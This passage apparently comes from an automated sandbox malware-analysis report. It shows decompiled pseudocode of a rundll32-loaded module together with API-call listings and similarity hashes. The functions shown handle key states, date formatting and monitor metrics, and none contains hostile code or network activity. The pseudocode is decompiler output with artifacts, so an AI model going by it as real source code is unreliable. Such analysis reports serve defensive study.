                          					_push(_t69);
                          					_push(0x2826b76);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t72;
                          					while(1) {
                          						_v17 = 0;
                          						_v8 = E0282677C(_v16, 2, _v10 & 0x0000ffff);
                          						if(_v8 != 0) {
                          							break;
                          						}
                          						if(_v24 == 0 || _v17 != 2) {
                          							_pop(_t64);
                          							 *[fs:eax] = _t64;
                          							_push(0x2826b7d);
                          							_t40 =  *0x2865b88; // 0x41d1e78
                          							return E027FED0C(_t40);
                          						} else {
                          							continue;
                          						}
                          						goto L14;
                          					}
                          					_t42 =  *0x2865b88; // 0x41d1e78
                          					E027FED14(_t42,  &_v8);
                          					_push(_t69);
                          					_push(0x2826b4b);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t72;
                          					_v17 = E02826924( &_v8, 0, _t69);
                          					_pop(_t67);
                          					 *[fs:eax] = _t67;
                          					_push(0x2826b52);
                          					_t48 =  *0x2865b88; // 0x41d1e78
                          					return E027FED0C(_t48);
                          				}
                          				L14:
                          			}



















                          APIs
                          • GetKeyState.USER32(00000010), ref: 02826A9C
                          • GetKeyState.USER32(00000011), ref: 02826AAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: State
                          • String ID:
                          • API String ID: 1649606143-3916222277
                          • Opcode ID: 76bc0a96edbe4801f73d6be948cf38466877462bec8563e96281665d251ab892
                          • Instruction ID: d5abf79ae49ce034d0d53b818902d3af17d0fbe174ac49918277521144eecd01
                          • Opcode Fuzzy Hash: 76bc0a96edbe4801f73d6be948cf38466877462bec8563e96281665d251ab892
                          • Instruction Fuzzy Hash: CC31F93DD04228AFEB12DFA8D8546ADB7FAFF48350F54C4A5E804E7290F7744A94CA21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E027DA1A4(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                          				char _v8;
                          				short _v18;
                          				short _v22;
                          				struct _SYSTEMTIME _v24;
                          				char _v280;
                          				char* _t32;
                          				intOrPtr* _t49;
                          				intOrPtr _t58;
                          				void* _t63;
                          				void* _t67;
                          
                          				_v8 = 0;
                          				_t49 = __edx;
                          				_t63 = __eax;
                          				_push(_t67);
                          				_push(0x27da282);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t67 + 0xfffffeec;
                          				E027D40E8(__edx);
                          				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                          				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                          				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                          				if(_t63 > 2) {
                          					E027D4180( &_v8, 0x27da2a4);
                          				} else {
                          					E027D4180( &_v8, 0x27da298);
                          				}
                          				_t32 = E027D45A8(_v8);
                          				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                          					E027D4358(_t49, 0x100,  &_v280);
                          					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                          						E027D4608( *_t49, E027D43A8( *_t49) - 1, 2, _t49);
                          					}
                          				}
                          				_pop(_t58);
                          				 *[fs:eax] = _t58;
                          				_push(E027DA289);
                          				return E027D40E8( &_v8);
                          			}














                          APIs
                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027DA282), ref: 027DA22A
                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027DA282), ref: 027DA230
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DateFormatLocaleThread
                          • String ID: yyyy
                          • API String ID: 3303714858-3145165042
                          • Opcode ID: 26ef4e33cadecc07f5fc4b79f55dbf73c4bbc723e1cff046cc4e073f98531630
                          • Instruction ID: 5c67f17db122b9dfb0906ec65f5ecdbd6dc56d01af32a15ebe780bffbba022d7
                          • Opcode Fuzzy Hash: 26ef4e33cadecc07f5fc4b79f55dbf73c4bbc723e1cff046cc4e073f98531630
                          • Instruction Fuzzy Hash: D9218079604208AFDB02EBA8C855BAF77B9FF49700F6140A5F945E7350E631AE00CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0282DB0C(void* __eflags, intOrPtr _a4) {
                          				char _v5;
                          				struct tagRECT _v21;
                          				struct tagRECT _v40;
                          				void* _t40;
                          				void* _t45;
                          
                          				_v5 = 1;
                          				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                          				_t45 = E027EB23C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                          				if(_t45 <= 0) {
                          					L5:
                          					_v5 = 0;
                          				} else {
                          					do {
                          						_t45 = _t45 - 1;
                          						_t40 = E027EB1E0(_t44, _t45);
                          						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                          							goto L4;
                          						} else {
                          							E0282D0F0(_t40,  &_v40);
                          							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                          							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                          								goto L4;
                          							}
                          						}
                          						goto L6;
                          						L4:
                          					} while (_t45 > 0);
                          					goto L5;
                          				}
                          				L6:
                          				return _v5;
                          			}









                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$EqualIntersect
                          • String ID: @
                          • API String ID: 3291753422-2766056989
                          • Opcode ID: c5a999c599bd121bc99b638634bc8ddc60aa00000a8e11a062f9caf24409d17c
                          • Instruction ID: 56cecd6fe234a8efe449b8dc6e60bae488ed9019877202cb2c35d6899cff2914
                          • Opcode Fuzzy Hash: c5a999c599bd121bc99b638634bc8ddc60aa00000a8e11a062f9caf24409d17c
                          • Instruction Fuzzy Hash: 771186396042585BCB11DA6CC898BDE7FEDAF49364F044291ED08DB352D771D9498B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E027F4E6C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t15;
                          				void* _t16;
                          				intOrPtr _t18;
                          				signed int _t19;
                          				void* _t20;
                          				intOrPtr _t21;
                          
                          				_t19 = _a12;
                          				if( *0x28658bb != 0) {
                          					_t16 = 0;
                          					if((_t19 & 0x00000003) != 0) {
                          						L7:
                          						_t16 = 0x12340042;
                          					} else {
                          						_t21 = _a4;
                          						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                          							goto L7;
                          						}
                          					}
                          				} else {
                          					_t18 =  *0x286589c; // 0x27f4e6c
                          					 *0x286589c = E027F4BD4(3, _t15, _t18, _t19, _t20);
                          					_t16 =  *0x286589c(_a4, _a8, _t19);
                          				}
                          				return _t16;
                          			}














                          APIs
                          • GetSystemMetrics.USER32(00000000), ref: 027F4EBA
                          • GetSystemMetrics.USER32(00000001), ref: 027F4ECC
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromPoint
                          • API String ID: 1792783759-1072306578
                          • Opcode ID: f35aa67b95562a31664af84cebe8066ec7023673d27a8d7cbf462b9abb4098cc
                          • Instruction ID: 99c0fde5b063dce6b7dde73b87fed247f88b0049422e46eb7b0cd80c9089bd87
                          • Opcode Fuzzy Hash: f35aa67b95562a31664af84cebe8066ec7023673d27a8d7cbf462b9abb4098cc
                          • Instruction Fuzzy Hash: 0301D635648208AFDF409F98D85CB6BBBA6E7403A4F845415FF189B782E3759C618B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E027F4D44(intOrPtr* _a4, signed int _a8) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t14;
                          				intOrPtr _t16;
                          				signed int _t17;
                          				void* _t18;
                          				void* _t19;
                          
                          				_t17 = _a8;
                          				_t14 = _a4;
                          				if( *0x28658ba != 0) {
                          					_t19 = 0;
                          					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                          						_t19 = 0x12340042;
                          					}
                          				} else {
                          					_t16 =  *0x2865898; // 0x27f4d44
                          					 *0x2865898 = E027F4BD4(2, _t14, _t16, _t17, _t18);
                          					_t19 =  *0x2865898(_t14, _t17);
                          				}
                          				return _t19;
                          			}













                          APIs
                          • GetSystemMetrics.USER32(00000000), ref: 027F4D95
                          • GetSystemMetrics.USER32(00000001), ref: 027F4DA1
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromRect
                          • API String ID: 1792783759-4033241945
                          • Opcode ID: 0b4a671b912acf4eb7cf8e19ee9074ea3d1ccbe254c61e4a6b3c705556452480
                          • Instruction ID: 5e1f28c319b192b84236537eab9f30d6c332285f0e38f1e2b0203ebeef071c73
                          • Opcode Fuzzy Hash: 0b4a671b912acf4eb7cf8e19ee9074ea3d1ccbe254c61e4a6b3c705556452480
                          • Instruction Fuzzy Hash: 7401D637608104ABDB509A4ED498B6BB7E9E7403A8F845451EF08CBB81C374D880CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027F4CBC(int _a4) {
                          				void* __ebx;
                          				void* __ebp;
                          				signed int _t2;
                          				signed int _t3;
                          				int _t8;
                          				void* _t12;
                          				void* _t13;
                          				void* _t17;
                          				void* _t18;
                          
                          				_t8 = _a4;
                          				if( *0x28658b8 == 0) {
                          					 *0x2865890 = E027F4BD4(0, _t8,  *0x2865890, _t17, _t18);
                          					return GetSystemMetrics(_t8);
                          				}
                          				_t3 = _t2 | 0xffffffff;
                          				_t12 = _t8 + 0xffffffb4 - 2;
                          				__eflags = _t12;
                          				if(__eflags < 0) {
                          					_t3 = 0;
                          				} else {
                          					if(__eflags == 0) {
                          						_t8 = 0;
                          					} else {
                          						_t13 = _t12 - 1;
                          						__eflags = _t13;
                          						if(_t13 == 0) {
                          							_t8 = 1;
                          						} else {
                          							__eflags = _t13 - 0xffffffffffffffff;
                          							if(_t13 - 0xffffffffffffffff < 0) {
                          								_t3 = 1;
                          							}
                          						}
                          					}
                          				}
                          				__eflags = _t3 - 0xffffffff;
                          				if(_t3 != 0xffffffff) {
                          					return _t3;
                          				} else {
                          					return GetSystemMetrics(_t8);
                          				}
                          			}













                          APIs
                          • GetSystemMetrics.USER32(?), ref: 027F4D1E
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          • GetSystemMetrics.USER32(?), ref: 027F4CE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: GetSystemMetrics
                          • API String ID: 1792783759-96882338
                          • Opcode ID: f1a9d8008ceb48c27385cada36580d70a7540e79dc5a91ee22c1d96e8237b046
                          • Instruction ID: 377e066954632c04f232b73d28137e8434bb1a2eed07146bf77a2e67e06611f5
                          • Opcode Fuzzy Hash: f1a9d8008ceb48c27385cada36580d70a7540e79dc5a91ee22c1d96e8237b046
                          • Instruction Fuzzy Hash: 7FF0B43291C1048BE7D09A3EA8AC23335ABEB85234FE06F20FB16577C9C3388841C254
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E028136C4(intOrPtr __eax) {
                          				signed char _v5;
                          				intOrPtr _v8;
                          				signed int _v9;
                          				signed int _t14;
                          
                          				_v8 = __eax;
                          				_t14 =  *0x2813708; // 0x0
                          				_v9 = _t14;
                          				if(GetKeyState(0x10) < 0) {
                          					_v9 = _v9 | 0x00000001;
                          				}
                          				if(GetKeyState(0x11) < 0) {
                          					_v9 = _v9 | 0x00000004;
                          				}
                          				if((_v5 & 0x00000020) != 0) {
                          					_v9 = _v9 | 0x00000002;
                          				}
                          				return _v9;
                          			}








                          APIs
                          • GetKeyState.USER32(00000010), ref: 028136D7
                          • GetKeyState.USER32(00000011), ref: 028136E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: State
                          • String ID:
                          • API String ID: 1649606143-3916222277
                          • Opcode ID: a2750bfef8ab95033ea5918b1463ea9975423da1fbd6e461a81748f247a7993b
                          • Instruction ID: 4fbd952154d0d4897eb3a95e496ef120668a5358d7b2323e84691ca22f8a7593
                          • Opcode Fuzzy Hash: a2750bfef8ab95033ea5918b1463ea9975423da1fbd6e461a81748f247a7993b
                          • Instruction Fuzzy Hash: 9EE0652C8483C864DF0292E8540B7DD7FFA0B063A8F5944E8CED4662C3D6F20205A217
                          Uniqueness

                          Uniqueness Score: -1.00%